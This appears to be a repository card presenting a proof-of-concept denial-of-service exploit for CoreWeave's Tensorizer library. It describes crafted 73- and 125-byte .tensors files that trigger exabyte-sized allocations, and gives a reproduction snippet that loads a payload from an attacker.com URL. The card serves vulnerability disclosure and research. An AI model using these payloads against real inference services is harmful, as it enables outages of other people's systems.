YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
PoC: Tensorizer Uncontrolled Memory Allocation DoS
Vulnerability
CoreWeave's Tensorizer library has two independent uncontrolled memory allocation vectors when loading .tensors files. Both read unsigned 64-bit integers from untrusted file data and use them directly for allocation without any upper bound validation.
Vector 1 โ Metadata total_len (serialization.py:841):
A crafted 73-byte file triggers reader.read(18,446,744,073,709,551,615) (~18.4 exabytes)
Vector 2 โ Tensor header_len (serialization.py:646):
A crafted 125-byte file triggers bytearray(18,446,744,073,709,551,615) (~18.4 exabytes)
Files
malicious_metadata_dos.tensorsโ 73-byte file, triggers metadata allocation DoSmalicious_8gb_dos.tensorsโ 73-byte file, triggers 8GB metadata allocationmalicious_header_dos.tensorsโ 125-byte file, triggers per-tensor header allocation DoScreate_malicious_tensors.pyโ Script to generate all PoC files
Reproduction
from tensorizer import TensorDeserializer
# This triggers a MemoryError or OOM kill:
d = TensorDeserializer('malicious_metadata_dos.tensors')
# Also works from remote URL (common production usage):
d = TensorDeserializer('https://attacker.com/malicious.tensors')
Impact
- Denial of Service on any ML inference service using Tensorizer
- Remotely triggerable via HTTP/S3 model URLs
- 73-byte payload crashes the process
- Affects CoreWeave's Inference platform and any Tensorizer user
NON-DESTRUCTIVE
These files only cause memory allocation attempts. No code is executed.
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support